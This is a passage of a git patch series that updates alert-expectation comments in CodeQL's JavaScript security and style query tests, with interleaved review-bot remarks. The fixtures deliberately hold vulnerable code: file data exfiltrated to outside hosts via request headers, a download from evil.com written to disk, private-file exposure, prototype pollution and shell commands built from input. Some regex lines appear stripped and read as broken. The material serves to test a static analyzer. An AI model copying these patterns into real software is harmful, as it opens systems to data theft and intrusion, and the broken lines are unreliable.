"%2F"); // $ Alert[js/incomplete-sanitization] } function bad11(s) { - return s.replace("%25", "%"); // $ Alert + return s.replace("%25", "%"); // $ Alert[js/incomplete-sanitization] } function bad12(s) { - return s.replace(`'`, ""); // $ Alert + return s.replace(`'`, ""); // $ Alert[js/incomplete-sanitization] } function bad13(s) { - return s.replace("'", ``); // $ Alert + return s.replace("'", ``); // $ Alert[js/incomplete-sanitization] } function bad14(s) { - return s.replace(`'`, ``); // $ Alert + return s.replace(`'`, ``); // $ Alert[js/incomplete-sanitization] } function bad15(s) { - 
return s.replace("'" + "", ""); // $ Alert + return s.replace("'" + "", ""); // $ Alert[js/incomplete-sanitization] } function bad16(s) { - return s.replace("'", "" + ""); // $ Alert + return s.replace("'", "" + ""); // $ Alert[js/incomplete-sanitization] } function bad17(s) { - return s.replace("'" + "", "" + ""); // $ Alert + return s.replace("'" + "", "" + ""); // $ Alert[js/incomplete-sanitization] } function good1(s) { @@ -130,23 +130,23 @@ function good12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // $ Alert - too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer - s.replace('[', '\\[').replace(']', '\\]'); // $ Alert - s.replace('{', '\\{').replace('}', '\\}'); // $ Alert + s.replace('[', '\\[').replace(']', '\\]'); + s.replace('{', '\\{').replace('}', '\\}'); s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // $ Alert - should have used a string literal if a single replacement was intended - s.replace(']', '').replace('[', ''); // probably OK, but still flagged + s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); // $ Alert - x.replace(x, y).replace("\n", ""); // $ Alert + x.replace("\n", "").replace(x, y); + x.replace(x, y).replace("\n", ""); } app.get('/some/path', function(req, res) { @@ -190,7 +190,7 @@ app.get('/some/path', function(req, res) { (function (s) { var indirect = /'/; - return s.replace(indirect, ""); // $ Alert + return s.replace(indirect, ""); // $ Alert[js/incomplete-sanitization] }); (function (s) { 
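Review bot: Six lines in `good12` and `newlines` (hunk `-130,23` of IncompleteSanitization/tst.js) lose their `// $ Alert` marker with nothing left to say whether the query is now expected to stay silent or is known to miss them. Two of them keep rationale text that still reads as a defect: `// too common as a bad HTML sanitizer` and `// should have used a string literal if a single replacement was intended`. If these are known false negatives, `// $ MISSING: Alert[js/incomplete-sanitization]` would keep the gap visible in the test; if they are accepted on purpose, starting the comment with `OK -` would say so. The later hunk at `-330,27` has the same problem: `bad18NewRegExp` and the two `new RegExp("[<>]", …)` cases drop their marker, while the string-literal form in `bad18` keeps `Alert[js/incomplete-sanitization]`. Another query in this directory may be meant to report some of these lines, which cannot be confirmed from the hunks shown.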
@@ -199,20 +199,20 @@ app.get('/some/path', function(req, res) { }); function bad18(p) { - return p.replace("/../", ""); // $ Alert + return p.replace("/../", ""); // $ Alert[js/incomplete-sanitization] } function typicalBadHtmlSanitizers(s) { - s().replace(/[<>]/g,''); // $ Alert - s().replace(/[<>&]/g, ''); // $ Alert - s().replace(/[<>"]/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(//g, '').replace(/&/g, ''); // $ Alert - s().replace(//g, ''); // $ Alert - s().replace(/&/g, '').replace(/>/g, '').replace(/]/g,''); + s().replace(/[<>&]/g, ''); + s().replace(/[<>"]/g, ''); + s().replace(//g, ''); + s().replace(//g, '').replace(/&/g, ''); + s().replace(//g, ''); + s().replace(/&/g, '').replace(/>/g, '').replace(//g, ''); // $ Alert + s = s.replace(/>/g, ''); s().replace(//g, '>').replace(/&/g, '&').replace(/"/g, '"'); s().replace(//g, '>').replace(/&/g, '&').replace(/'/g, '''); // OK - single quotes or double quotes both work @@ -306,7 +306,7 @@ function incompleteHtmlAttributeSanitization2() { } function incompleteComplexSanitizers() { - '=\'' + s().replace(/[&<>"]/gm, function (str) { // $ Alert + '=\'' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") return "&"; if (str === "<") @@ -315,7 +315,7 @@ function incompleteComplexSanitizers() { return ">"; if (str === "\"") return """; - }) + '\''; + }) + '\''; // $ Alert[js/incomplete-html-attribute-sanitization] '="' + s().replace(/[&<>"]/gm, function (str) { if (str === "&") 
@@ -330,27 +330,27 @@ function incompleteComplexSanitizers() { } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", "g"),''); // $ Alert + s().replace(new RegExp("[<>]", "g"),''); } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", unknown()),''); // $ Alert + s().replace(new RegExp("[<>]", unknown()),''); } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); // $ Alert + return p.replace(new RegExp("\\.\\./"), ""); } function bad4NewRegExpG(s) { - return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExp(s) { - return s.replace(new RegExp("\'"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExpUnknown(s) { - return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert + return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert[js/incomplete-sanitization] } function newlinesNewReGexp(s) { @@ -359,8 +359,8 @@ function newlinesNewReGexp(s) { x.replace(new RegExp("\n", "g"), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", "g"), ""); - x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert - x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert + x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert[js/incomplete-sanitization] x.replace(new RegExp("\n", unknownFlags()), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", unknownFlags()), ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-178/tst.js b/javascript/ql/test/query-tests/Security/CWE-178/tst.js index 4d320438eb54..9394d6303fa0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-178/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-178/tst.js 
@@ -88,7 +88,7 @@ app.get('/baz3/a', (req, resp) => { resp.send({ test: 123 }); }); -app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); +app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); // $ Alert app.get('/currentGame', function (req, res) { res.send("FOO"); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js index 4509c3c6cc76..d197c141cb14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js @@ -7,4 +7,4 @@ https.get({ path: "/upload", method: "GET", headers: { Referer: content } -}, () => { }); +}, () => { }); // $ Alert[js/file-access-to-http] diff --git a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js index b534af05b92f..23c29cde28ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js @@ -4,8 +4,8 @@ var path = require("path"); var app = express(); -app.use('basedir', express.static(__dirname)); // $ Alert +app.use('basedir', express.static(__dirname)); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; -app.use('basedir', express.static(rootDir)); // $ Alert +app.use('basedir', express.static(rootDir)); // $ Alert[js/exposure-of-private-files] -app.use('/monthly', express.static(__dirname + '/')); // $ Alert \ No newline at end of file +app.use('/monthly', express.static(__dirname + '/')); // $ Alert[js/exposure-of-private-files] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index d1199c259e3e..c3aaec3926ff 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js 
@@ -5,21 +5,21 @@ var path = require("path"); var app = express(); // Not good. -app.use(express.static('./node_modules/angular')); -app.use('/angular', express.static('node_modules/angular')); -app.use('/animate', express.static('node_modules/angular-animate')); -app.use('/js', express.static(__dirname + '/node_modules/angular')); -app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); -app.use(express.static('/node_modules/angular')); -app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); -app.use('/js',express.static('./')); -app.use('/angular', express.static("./node_modules" + '/angular/')); -app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); +app.use(express.static('./node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static('node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/animate', express.static('node_modules/angular-animate')); // $ Alert[js/exposure-of-private-files] +app.use('/js', express.static(__dirname + '/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); // $ Alert[js/exposure-of-private-files] +app.use(express.static('/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] +app.use('/js',express.static('./')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static("./node_modules" + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); // $ Alert[js/exposure-of-private-files] 
+app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; const nodeDir = path.join(rootDir + "/node_modules"); -app.use('/angular', express.static(nodeDir + '/angular/')); +app.use('/angular', express.static(nodeDir + '/angular/')); // $ Alert[js/exposure-of-private-files] @@ -37,10 +37,10 @@ app.use('basedir', express.static(__dirname)); // OK - because there is no packa app.use('/monthly', express.static(__dirname + '/')); // OK - because there is no package.json in the same folder. const connect = require("connect"); -app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert -app.use('/root', require('serve-static')("/")); // $ Alert +app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert[js/exposure-of-private-files] +app.use('/root', require('serve-static')("/")); // $ Alert[js/exposure-of-private-files] // Bad documentation example function bad() { @@ -48,7 +48,7 @@ function bad() { var app = express(); - app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert + app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] } // Good documentation example 
@@ -67,7 +67,7 @@ const serveHandler = require("serve-handler"); const http = require("http"); http.createServer((request, response) => { - serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert + serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert[js/exposure-of-private-files] serveHandler(request, response); }).listen(8080); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js index dc86544b5d36..5c4df5220b80 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js @@ -22,7 +22,7 @@ try { res.setEncoding('utf8'); }); - post_req.write(s); // $ Alert - post the data from file to request body + post_req.write(s); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } catch (e) { } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js index d20c27d0eae7..506eead886cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js @@ -26,7 +26,7 @@ fs.exists(fileName, function (exists) { res.setEncoding('utf8'); }); - req.write(chunk); // $ Alert - write data from file to request body + req.write(chunk); // $ Alert[js/file-access-to-http] - write data from file to request body req.end(); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/request.js b/javascript/ql/test/query-tests/Security/CWE-200/request.js index 22097c49f5ed..13c98c8fd939 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/request.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/request.js 
@@ -19,8 +19,8 @@ function PostXML(xmlData) headers: { "content-type": "application/xml", }, - body: xmlData // $ Alert - passing data from file to the request body - }, function (error, response, body){ + body: xmlData // passing data from file to the request body + }, function (error, response, body){ // $ Alert[js/file-access-to-http] console.log(response); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js index f663e9f286da..9bd2122a183b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js @@ -15,14 +15,14 @@ try { hostname: "sstatic1.histats.com", path: "/0.gif?4103075&101", method: "GET", - headers: { Referer: "http://1.a/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://1.a/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] https1.get({ hostname: "c.statcounter.com", path: "/11760461/0/7b5b9d71/1/", method: "GET", - headers: { Referer: "http://2.b/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://2.b/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] }); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js index ec2e40a7c2b3..b6243e115f1c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js 
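Review bot: In `PostXML` the reason and the expectation are now on different lines. `body: xmlData // passing data from file to the request body` keeps the explanation, while `// $ Alert[js/file-access-to-http]` lands on the `}, function (error, response, body){` line, which handles no file data itself. Presumably the marker has to sit where the reported options object ends; a suffix in the style used elsewhere in this directory, e.g. `// $ Alert[js/file-access-to-http] - file data sent in the request body above`, would keep the case readable as file-to-network exfiltration. The two `https1.get` calls in sentAsHeaders.js and the `DefinePlugin` call in CWE-312/build-leaks.js are split the same way. `PostXML` begins and ends outside the hunk.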
@@ -3,4 +3,4 @@ var http = require('http') var app = express() var server = http.createServer(app) // Static files: -app.use(express.static(__dirname)) +app.use(express.static(__dirname)) // $ Alert[js/exposure-of-private-files] diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js index 63aa2666c69d..016e89c00a9b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js @@ -1 +1 @@ -window.parent.postMessage(userName, '*'); +window.parent.postMessage(userName, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js index 6a38d5a02a27..112f308499c3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js @@ -10,4 +10,4 @@ window.parent.postMessage(password, '*'); // $ Alert window.parent.postMessage(data.bar, '*'); })(); -window.parent.postMessage(authKey, '*'); +window.parent.postMessage(authKey, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js index 50f5ae277146..f36ccfbc0990 100644 --- a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js @@ -5,7 +5,7 @@ let requestOptions = { "content-type": "application/json", "accept": "application/json" }, - rejectUnauthorized: false, + rejectUnauthorized: false, // $ Alert requestCert: true, agent: false } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js index 92ecbb49e58d..9d7648df8e33 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js @@ -1,9 +1,9 @@ const webpack = require("webpack"); -var plugin = new webpack.DefinePlugin({ // $ Alert +var plugin = new webpack.DefinePlugin({ "process.env": JSON.stringify(process.env) -}); +}); // $ Alert[js/build-artifact-leak] new webpack.DefinePlugin({ 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG }) }) diff --git a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js index b7d99c2c9eec..4c2e13deaa64 100644 --- a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js +++ b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js @@ -12,5 +12,5 @@ var actions = { app.get('/perform/:action/:payload', function(req, res) { let action = actions[req.params.action]; - res.end(action(req.params.payload)); + res.end(action(req.params.payload)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js index 3fd3780bf860..8d89560e51f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js +++ b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js @@ -5,7 +5,7 @@ app.get('/:path', function(req, res) { let path = req.params.path; if (isValidPath(path)) res.sendFile(path); -}); +}); // $ Alert function f1(req, res) { let path = req.params.path; @@ -22,4 +22,4 @@ function f3(req, res) { res.sendFile(path); } -app.get('/:path', f1, f2, f3); +app.get('/:path', f1, f2, f3); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js index 77645d0f3ac4..2a7c5d2f7b87 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js @@ -3,6 +3,6 @@ var fs = require("fs"); https.get('https://evil.com/script', res => { res.on("data", d => { - fs.writeFileSync("/tmp/script", d) + fs.writeFileSync("/tmp/script", d) // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index ad420927a5c4..95bc34a79cf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index 8111eb36d94a..8f6ded8b2a91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -8,13 +8,13 @@ app.get('/hello', function(req, res) { _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // $ Alert - }); + value: req.query.value + }); // $ Alert let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // $ Alert - }); + value: opts.thing + }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js index ea1966d190b7..5ff77f4e77bc 100644 
--- a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js @@ -2,7 +2,7 @@ function bad1() { if (cond1()) if (cond2()) return 23; - else + else // $ Alert return 42; } @@ -18,7 +18,7 @@ function bad2() { if (cond1()) { if (cond2()) { return 23; - } else { + } else { // $ Alert return 42; }} } @@ -37,7 +37,7 @@ function bad3() { else if (cond2()) if (cond2()) return 42; - else + else // $ Alert return 42; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js index 914229480a18..2b9be9c5874b 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js @@ -1,5 +1,5 @@ function f() { if (someCond()) - return; + return; // $ Alert return 42; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js index 7eb15c1006ae..a06361e01438 100644 --- a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js +++ b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js @@ -1,7 +1,7 @@ switch (a) { case 0: case 1: - case2: + case2: // $ Alert f(); break; default: diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html index f039917e0c73..c01acb8a6b32 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html @@ -4,7 +4,7 @@ 
diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js index 11cc92b5b27a..f23767bfe19a 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js @@ -1,7 +1,7 @@ function bad1() { if (cond()) f(); - g(); + g(); // $ Alert } function good1() { @@ -22,7 +22,7 @@ function bad2() { f(); else g(); - h(); + h(); // $ Alert } function good3() { @@ -34,7 +34,7 @@ function good3() { function wbad1() { while (cond()) f(); - g(); + g(); // $ Alert } function wgood1() { diff --git a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html index 6176fc9a39f1..7d80dd84642e 100644 --- a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html +++ b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html @@ -6,7 +6,7 @@ - +
    diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js index ba28c486ce31..6deedccfd340 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js @@ -146,4 +146,4 @@ for (const [key, key2, key3, value] of array) { } for (const [key, key2, key3, value] of array) {} // $ Alert -for (let i of [1, 2]) {} \ No newline at end of file +for (let i of [1, 2]) {} // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js index 446e51ede1e4..a0a7ddf33416 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js @@ -2,7 +2,7 @@ function f() { return 23; - var a = 42; + var a = 42; // $ Alert } function g(x) { @@ -35,7 +35,7 @@ function k() { } throw new Error(); -f(); +f(); // $ Alert function l(x) { switch(x) { @@ -60,7 +60,7 @@ function m(x) { if (true) x; else - y; + y; // $ Alert function f(){ if (x) { diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js index 53496ce2e4ef..cf0c23603e2a 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js @@ -5,7 +5,7 @@ function findValue(values, x, start, end) { return i; } } - if (i < end) { + if (i < end) { // $ Alert return i; } return -1; 
diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js index 4cc1fd775a43..58b9232cc161 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js @@ -5,6 +5,6 @@ }); (function(){ - (function (i) { if (i == 100000) return; })(1); - (function f(i) { if (i == 100000) return; f(i+1); })(1); + (function (i) { if (i == 100000) return; })(1); // $ Alert + (function f(i) { if (i == 100000) return; f(i+1); })(1); // $ Alert }); diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js index 5741191d62d3..fef5cb07408f 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js @@ -1,3 +1,3 @@ { "x": 42 -} \ No newline at end of file +} // $ Alert \ No newline at end of file From 07a876b4e94fb7d820ca5061ce085674e1b7d316 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:20:27 +0100 Subject: [PATCH 056/892] JS: Accept some alerts at the SystemCommandExecution location --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index d932fbfe113e..3a5f05fac77e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js 
@@ -424,8 +424,8 @@ module.exports.shellOption = function (name) { spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; arr.push(name); // $ Alert - spawn("rm", arr, SPAWN_OPT); - spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. + spawn("rm", arr, SPAWN_OPT); // $ Alert + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // $ Alert } function build(first, last) { From f3956518072e720a25a81a8db6f9c625bd397fe0 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:38:03 +0100 Subject: [PATCH 057/892] JS: Mark alert as MISSING See https://github.com/github/codeql-javascript-team/issues/447 --- .../query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 739ec2a912be..667bbe822140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -30,7 +30,7 @@ app.get('/user/:id', function(req, res) { ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ MISSING: Alert - the 'markdown-table' model needs to be converted to a flow summary }); var showdown = require('showdown'); From 1f3c49638bdc35d769fb88b77fe6fc29f3f2b716 Mon Sep 17 00:00:00 2001 
